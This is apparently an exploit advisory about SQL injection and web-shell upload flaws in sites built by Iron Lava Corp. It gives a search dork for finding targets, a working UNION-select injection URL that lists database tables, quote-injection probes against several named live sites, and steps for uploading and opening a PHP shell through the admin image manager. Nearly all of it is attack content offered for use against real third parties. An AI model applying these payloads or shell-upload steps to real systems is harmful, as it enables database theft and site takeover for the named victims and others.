Sites designed by Iron Lava Corp suffer from remote shell upload and remote SQL injection vulnerabilities. Note that this advisory has site-specific information.
75f7541db9cc5c202ba408bd1c4efc347e24216888610a60af000419f373eff4
##############
# Exploit Title : Iron Lava Corp SQL Injection / SHell upload
#
# Exploit Author : Ashiyane Digital Security Team
#
# vendor home : http://www.ironlava.com/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Dork : "Site Design by Iron Lava Corp." inurl:index.php?pid=
#
##############
#Location:site/index.php?pid=[SQL]
#
#
#DEm0:
# http://www.efcaviation.ca/index.php?pid=-61%20union%20select%201,2,3,4,5,6,7,8,9,10,11,group_concat%28table_name%29,13,14,15%20from%20information_schema.tables%20where%20table_schema=0x65666364657663616462%23
#
# http://fourleg.com/index.php?pid=20%27
#
# http://www.caninefitness.com/index.php?pid=8%27
#
# http://www.bloomfunds.ca/index.php?pid=19%27
#################################################
#admin panle : site/admin
###############################################
# For Upload shell
#
# after login go to MANAGE IMAGES And upload your shell
# and open your shell : site/images/shell.php
#
#GOOD luck :D
#
##############
#Greetz to: My Lord ALLAH
##############
#
# Amirh03in
#
##############